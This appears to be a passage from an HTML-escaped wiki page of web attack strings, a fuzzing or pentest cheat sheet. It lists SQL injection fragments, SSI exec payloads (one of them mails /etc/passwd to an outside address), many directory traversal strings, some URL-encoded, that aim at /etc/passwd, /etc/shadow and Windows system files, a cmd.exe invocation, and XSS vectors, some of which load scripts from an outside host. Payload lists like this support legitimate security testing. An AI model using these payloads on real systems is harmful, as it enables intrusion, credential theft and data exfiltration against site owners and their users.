//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
